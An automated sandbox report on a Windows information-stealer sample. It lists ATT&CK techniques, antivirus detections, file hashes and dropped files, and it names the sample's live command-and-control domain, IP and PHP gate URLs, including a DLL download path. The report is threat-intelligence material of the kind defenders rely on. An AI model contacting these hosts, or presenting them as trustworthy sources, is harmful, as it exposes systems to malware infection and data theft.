Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	21 Software Packing	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Input Capture	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 File Deletion	NTDS	154 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	11 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	11 Virtualization/Sandbox Evasion	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Process Injection	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Owner/User Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 Remote System Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Link
B7VbZC8QLf.exe	30%	ReversingLabs
B7VbZC8QLf.exe	37%	Virustotal	Browse
B7VbZC8QLf.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.B7VbZC8QLf.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1234158	Download File
0.2.B7VbZC8QLf.exe.8a0e67.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.3.B7VbZC8QLf.exe.8c0000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
jerrysmith.online	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://ctlrysmith.online/410b5129171f10ea.php	0%	Avira URL Cloud	safe
http://jerrysmith.online/410b5129171f10ea.phpcdac5200014617065a0ce8d9d8tions	0%	Avira URL Cloud	safe
http://jerrysmith.online/410b5129171f10ea.phpit.exe	0%	Avira URL Cloud	safe
http://jerrysmith.online/410b5129171f10ea.phpcdac5200014617065a0ce8d9d8Unindexed	0%	Avira URL Cloud	safe
http://jerrysmith.online	0%	Avira URL Cloud	safe
http://jerrysmith.online/410b5129171f0ea.php	0%	Avira URL Cloud	safe
http://jerrysmith.online/410b5129171f10ea.phper	0%	Avira URL Cloud	safe
http://jerrysmith.online/410b5129171f10ea.php	0%	Avira URL Cloud	safe
http://jerrysmith.online/c043bcd0ba06ae1d/sqlite3.dll	0%	Avira URL Cloud	safe
http://jerrysmith.online/410b5129171f10ea.phpn:	0%	Avira URL Cloud	safe
http://jerrysmith.online?	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
jerrysmith.online	85.31.45.22	true	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://jerrysmith.online/410b5129171f0ea.php	true	Avira URL Cloud: safe	unknown
http://jerrysmith.online/c043bcd0ba06ae1d/sqlite3.dll	true	Avira URL Cloud: safe	unknown
http://jerrysmith.online/410b5129171f10ea.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	CBAKJKJJ.0.dr	false		high
https://search.yahoo.com?fr=crmas_sfp	B7VbZC8QLf.exe, 00000000.00000003.318405421.0000000009023000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJ.0.dr	false		high
https://duckduckgo.com/chrome_newtab	B7VbZC8QLf.exe, 00000000.00000003.318405421.0000000009023000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJ.0.dr	false		high
http://jerrysmith.online/410b5129171f10ea.phper	B7VbZC8QLf.exe, 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://jerrysmith.online/410b5129171f10ea.phpn:	B7VbZC8QLf.exe, 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmp, B7VbZC8QLf.exe, 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	CBAKJKJJ.0.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	B7VbZC8QLf.exe, 00000000.00000003.318405421.0000000009023000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJ.0.dr	false		high
http://jerrysmith.online/410b5129171f10ea.phpcdac5200014617065a0ce8d9d8tions	B7VbZC8QLf.exe, 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://ctlrysmith.online/410b5129171f10ea.php	B7VbZC8QLf.exe, 00000000.00000002.351827343.0000000000972000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://jerrysmith.online/410b5129171f10ea.phpit.exe	B7VbZC8QLf.exe, 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com?fr=crmas_sfpf	B7VbZC8QLf.exe, 00000000.00000003.318405421.0000000009023000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJ.0.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	CBAKJKJJ.0.dr	false		high
http://jerrysmith.online/410b5129171f10ea.phpcdac5200014617065a0ce8d9d8Unindexed	B7VbZC8QLf.exe, 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	B7VbZC8QLf.exe, 00000000.00000003.318405421.0000000009023000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJ.0.dr	false		high
http://jerrysmith.online?	B7VbZC8QLf.exe, 00000000.00000002.352104857.00000000023F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	CBAKJKJJ.0.dr	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	B7VbZC8QLf.exe, 00000000.00000003.318405421.0000000009023000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJ.0.dr	false		high
http://jerrysmith.online	B7VbZC8QLf.exe, 00000000.00000002.352104857.00000000023F5000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.sqlite.org/copyright.html.	B7VbZC8QLf.exe, 00000000.00000002.352330459.000000000305C000.00000004.00000020.00020000.00000000.sdmp, B7VbZC8QLf.exe, 00000000.00000002.354583978.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
85.31.45.22	jerrysmith.online	Germany		43659	CLOUDCOMPUTINGDE	true

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	832130
Start date and time:	2023-03-22 11:20:14 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	B7VbZC8QLf.exe
Original Sample Name:	763c3550f4e0a97baa4ebd6fc8c61996.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@6/19@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 97.7% (good quality ratio 89.1%) Quality average: 70% Quality standard deviation: 31.5%
HCA Information:	Successful, ratio: 100% Number of executed functions: 50 Number of non-executed functions: 20
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Excluded domains from analysis (whitelisted): www.bing.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
85.31.45.22	YRxyFQfswg.exe	Get hash	malicious	Stealc, Vidar	Browse	getgoodsa.link/410b5129171f10ea.php
85.31.45.22	file.exe	Get hash	malicious	Cryptbot, MinerDownloader, RedLine, Stealc, Vidar, Xmrig	Browse	getgoodsa.link/410b5129171f10ea.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
jerrysmith.online	wQNd0uhGFZ.exe	Get hash	malicious	Stealc, Vidar	Browse	185.185.68.241

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDCOMPUTINGDE	1BxK45jwCt.exe	Get hash	malicious	Cryptbot	Browse	85.31.45.219
	oBDfOMaHiw.exe	Get hash	malicious	CryptbotV2	Browse	85.31.45.219
	qzODIOSiWH.exe	Get hash	malicious	CryptbotV2	Browse	85.31.45.219
	Joc5oBzA3U.exe	Get hash	malicious	CryptbotV2	Browse	85.31.45.219
	file.exe	Get hash	malicious	CryptbotV2, MinerDownloader, RedLine, Stealc, Vidar, Xmrig	Browse	85.31.45.22
	S76J7setuo.exe	Get hash	malicious	CryptbotV2	Browse	85.31.45.219
	Kn427RgPkj.exe	Get hash	malicious	Cryptbot, RedLine, Stealc, Xmrig	Browse	85.31.45.219
	F4cejyW26j.exe	Get hash	malicious	Cryptbot	Browse	85.31.45.219
	bWi6vHfild.exe	Get hash	malicious	Cryptbot	Browse	85.31.45.219
	hMD6Q7iUUh.exe	Get hash	malicious	Cryptbot	Browse	85.31.45.219
	e1KsgU8At9.exe	Get hash	malicious	Cryptbot	Browse	85.31.45.219
	004QAFBOSa.exe	Get hash	malicious	CryptbotV2	Browse	85.31.45.219
	YRxyFQfswg.exe	Get hash	malicious	Stealc, Vidar	Browse	85.31.45.22
	0K2whxOlui.exe	Get hash	malicious	Cryptbot	Browse	85.31.45.219
	YPhnQpvXBf.exe	Get hash	malicious	CryptbotV2	Browse	85.31.45.219
	zxFIBdAH8c.exe	Get hash	malicious	Cryptbot	Browse	85.31.45.219
	file.exe	Get hash	malicious	Cryptbot, MinerDownloader, RedLine, Stealc, Vidar, Xmrig	Browse	85.31.45.22
	2bNYghfB7V.exe	Get hash	malicious	Cryptbot	Browse	85.31.45.219
	eMPUtbq2ye.exe	Get hash	malicious	Cryptbot	Browse	85.31.45.219
	ACH_ deposit _receipt12901234.exe	Get hash	malicious	XWorm	Browse	80.76.51.68

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\CBAKJKJJ

Download File

Process:	C:\Users\user\Desktop\B7VbZC8QLf.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.287139506398081
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
MD5:	292F98D765C8712910776C89ADDE2311
SHA1:	E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
SHA-256:	9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
SHA-512:	205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FCGCFCAFIIEBGCBFCAKKJKJJKK

Download File

Process:	C:\Users\user\Desktop\B7VbZC8QLf.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.4393511334109407
Encrypted:	false
SSDEEP:	24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
MD5:	8C31C5487A97BBE73711C5E20600C1F6
SHA1:	D4D6B04226D8FFC894749B3963E7DB7068D6D773
SHA-256:	A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
SHA-512:	394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKJKKJJKJEGIECAKJJEB

Download File

Process:	C:\Users\user\Desktop\B7VbZC8QLf.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\BPMLNOBVSB.docx

Download File

Process:	C:\Users\user\Desktop\B7VbZC8QLf.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702896917219035
Encrypted:	false
SSDEEP:	24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
MD5:	C68274AA8B7F713157BEBE2FCC2EA5D3
SHA1:	52A5A2D615A813B518DDAAC2A02095F1059DAAD5
SHA-256:	362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
SHA-512:	BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
Malicious:	true
Preview:	BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

C:\Users\user\Desktop\CURQNKVOIX.xlsx

Download File

Process:	C:\Users\user\Desktop\B7VbZC8QLf.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688505748329201
Encrypted:	false
SSDEEP:	24:fOpwMLhSm1UbWgtD1i0Sn1EcsITViZiFeEaf:gLhSGqP1vSn11l8ceTf
MD5:	E791BC4BB488A2AE526214AB2CCF03F0
SHA1:	FEBDEFE4D61586EE877A369BB31B4B92B19D5E2D
SHA-256:	4EFC0B5E75E9B1A642F3BC4FACAE7C8F8C77DFAD5F6C0F3F2C807B3654576616
SHA-512:	61EF6F62E86F65DA2E7CC9821DA2AD669C4AD62275A044153BCE247AB2FCCC938B7EB57C46099AB4A84909CEC5104FF5B95D12161C3D7AA353B79647122C15BB
Malicious:	false
Preview:	CURQNKVOIXHCBQTSXQTLVFUQNXQHHCWYVOGQUFVROSMMUONAUKUVELZWAMQGAGYEFMWBMUVKBAZCJASDGVTNFSHXHAPKEOWREALSYDMQPTJCKDQQZDNAPQIKAIKYDUXQDSIUJTIPCNAAPMQGBGORBBNYWTYRCODCKULTLKEDUVEVKYPTDPYWDHCCBFECLXTAHWTXYPAZBSUTWHNQPXUDZWAFEXNNPHGXWELAOZZREMNKMEKGTYGDHHUPJBMUOYYXAJRRWPIQWIEPWHTLVXJLPGWKHKFXPDTYKJNXBLYYCPPFYQHGBFNFBWUMKZVGJIAVXIXSEBJLYUYIFUDPWOVTOOTBWQNFVWLEYTFZYMTVZTCXTNNOBULSEYPLNAUCUUXLNZYIOCYYDRCXSVNBKUELOGHSLSPEKWUKINGRPMAGAJOPDOAGHPUAWUEWUGLAMOKASQCGYIJJNOEPUMCDLGYXGDJZABOLHJPLTUZIRBYLLYXROOEMOQWYXXOAXTWHXGMBRZIHEQPGICIJAOUSIKAJLZMEYDYWOFIVZEOLJQJXJLMMENDALUSENORVPGKLPBGAOQTNXCQSBECDXXCUNXHQLIPKOPVIETEIHHAZEFGOVYXJDBAQKQLDPIRHULNGBRDMBBZUKYVYIMBYVBNOIAKOFSHELZEVHLIYEWGVJXILTMZMBNWYJQUHFWZYDKPGFHJSRFOPTSUPYFZPRAIHCOAERERYGBLWLZZXLVAABEELDQELBYYROYSDLAWBIXRDKWLSLZQHNQYXERTVTNXGSHYGJOFVZISVKALMEBXVVOOXWYXSEINIZOTUVHTHDUHOJYJHLRGMSQXTWPSJZLTSSIKIIZPANAJSXTZAQBOKZRWBIRVFAHJIOEWMRKYMRVDYTGEWXHCWSRYRIGQHBYXEUXHZUSULJVNSYTNQRKAFOOQPRHBAAWVXLENJLGFYHTWUFVYSQDBXKEFYRPMBGBHQLJSVGLYIZQREICHIHYUTGCEP

C:\Users\user\Desktop\DUKNXICOZT.xlsx

Download File

Process:	C:\Users\user\Desktop\B7VbZC8QLf.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694015263253693
Encrypted:	false
SSDEEP:	24:pE8hRSoFxFv2tFu66PaDs7Wya/4QEssgd8uS:pE8nSoFxFvaCgoWc/gd8L
MD5:	CA67F06C14A077335756DA58259702DC
SHA1:	38A16C7089B83C544B5A58A1A91EE36AB2EE7F38
SHA-256:	6EDC691DABB9C6D794637CB2149341BB454C0490C01BBEF92C3BD48BB86B2329
SHA-512:	1754DE4F4BAC84BD0D0E605157AEFD00599B1641042A3F77AEA16614FE595B7090595C982C1679D910C20A2BF53936BAB648FF31C2CF82F3F9AD985D22EA14E8
Malicious:	false
Preview:	DUKNXICOZTGLPDSRRQNKVCEQUFBSMCGTLOLLPKYXLUAXKQNZYDHXTQPNHHFHJTMIGEVVJMXNTUPFEQSTIPWCYHGFUQMXUYJBEEKJNRRCNFODXCAMAXLAZTIQUNTNPGERBSYITUYWBHPPZHKLUNSGUFMHVRZKTGCTKCZZJDJJKZRDBOFQSLPJQVAUHFJGITHWOZYPLVWBUXHBXXXJUCPJMVLNEPNKDIZKYGMCDARTHGXLNZDXRLUSQRQMRUGCFVVHERGNVXKXGPTCXBJJSYOTZHCRWDCIILVDANNRVWIHRUKXNEWVKZLEBJFPCBFWGQGWGNAHYWNRYILMVTJYSQGDDEIOTQFNFCPBIFXMUECMBHHGKFHGYAPHBDYRWVLPTNZQXENCWRMKRIQEHFZXOHUQUMEVRRXBUGYMSBZKQNTNXORTCHQQTODUBHKLIIDLWFSVAULMVBXACHFRLSBSAGSWTRHIIZFLUSWOCTUGDAHTWKZBYIVQRRYRKRAUTQQLIUHDWFKYDUVNGBMEZUTAFTTKYLQLJJTEVOLXVXBJATRZJRTOISUFLOLZCIBSUKLPDJXJBNUXCGPOLEGGOYZSOMTIWZMXNMUQTDLWGLIFCOJBEBCJQCSUDSWMKJERKRVNPKGTBPKKHLFCUULARSYSMUUYOBVXGHJPZEQKZTIWHIOQYDFCLYHJZKEDUCRZKCLMBUTIQDOHZOSLLXZMPKRTSVSHOIOGCLWGQOYRPDVACEIULCNRQDMRTSTZBWQMCLPDYWEXUCNSMFNSLTBNUAJKDHOPGLEHJPRKNWCKRZSOJXBNVSNBJBRTNVXHVKISJRPDYQBKOXYGOTQXOJKNGSOSFTFSIVNPFOAYLIRBSAREFWQPLONYPUBHJPFGRFFPXAQEEPWYSTOTGMJMHXBQMNEWRCBJRORHQBKISQFFCDYLOWZILZFBCXTYETKBEANFDVZBQHUOSIHHQTXPKVPTCPOPJEEGGSIDPOLYQHTCFCAHOXRL

C:\Users\user\Desktop\EFOYFBOLXA.docx

Download File

Process:	C:\Users\user\Desktop\B7VbZC8QLf.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696178193607948
Encrypted:	false
SSDEEP:	24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
MD5:	960ECA5919CC00E1B4542A6E039F413E
SHA1:	2079091F1BDF5B543413D549EF9C47C5269659BA
SHA-256:	A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
SHA-512:	57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
Malicious:	false
Preview:	EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

C:\Users\user\Desktop\EWZCVGNOWT.xlsx

Download File

Process:	C:\Users\user\Desktop\B7VbZC8QLf.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUP